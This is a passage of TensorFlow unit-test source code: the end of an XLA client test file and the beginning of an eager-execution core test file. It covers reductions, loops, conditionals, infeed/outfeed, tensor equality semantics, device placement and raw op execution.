c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
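# ReduceWindow is a sliding-window reduction. VALID keeps only windows
# that lie entirely inside the operand, while SAME pads with init_value
# (0 here) so every input position starts a window -- hence the extra
# row of partial-window sums in the SAME tests.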
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
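# While threads a single loop-state value through cond and body: these
# tests start at 1.0 and double while the value is < 10, so the state
# runs 1 -> 2 -> 4 -> 8 -> 16 and the loop exits with 16.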
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
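# Infeed/Outfeed move data between the host and a running computation.
# The infeed queue may be filled ahead of execution, but an outfeed must
# be drained by the host before Execute can finish, which is why the
# round-trip test runs Execute on a separate thread.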
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegex(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(LocalComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
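# `execute` dispatches a raw eager op by name. Attrs are passed as a
# flat tuple alternating attr names and values, the format the
# low-level eager execute path expects.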
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
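# Splitting the single physical CPU into two logical devices lets
# multi-device placement tests (e.g. testMultiCpuPlacement's 'cpu:1')
# run on hosts that have only one physical CPU.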
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.abc.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.abc.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
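# With tensor equality disabled (the TF1 behavior), Tensor.__eq__
# compares by identity and tensors are hashable; with it enabled (the
# TF2 behavior), == is element-wise like NumPy and eager tensors are
# unhashable. _v1_check/_v2_check and _test_hashable assert exactly
# this split.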
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert the result array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Note: list equality short-circuits on object identity, so even though
# element-wise tensor comparison normally can't be collapsed to a bool,
# both TF and NumPy accept lists containing the *same* objects without
# raising an error.
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similarly, an `in` check such as `a in [a, b]` shouldn't work in
# general, but it does when `a` is the first element because the
# identity check short-circuits.
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert the result array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
@test_util.disable_tfrt('Device name incorrect (known issue for runtime '
'fallback).')
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# What y.device should be depends on the default placement behavior
# when no device is explicitly specified in the context. That behavior
# is subject to change (for example, we may later prefer GPUs, if
# available, when no device is explicitly provided).
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
# A bare try/except that only re-raised added nothing; let exceptions
# propagate naturally.
t = threading.Thread(target=target, args=args)
t.start()
t.join()
# Check that thread-local context values are initialized to the same
# defaults in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
@test_util.disable_tfrt('Device name incorrect (known issue for runtime '
'fallback).')
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if y were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Even though we specified the CPU device, the read op runs on the
# device where the handle lives.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
@test_util.disable_tfrt('TensorHandleInterface::Resolve() not implemented.')
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),  # int32 inputs to match the 'T' attr
constant_op.constant([[5]])],
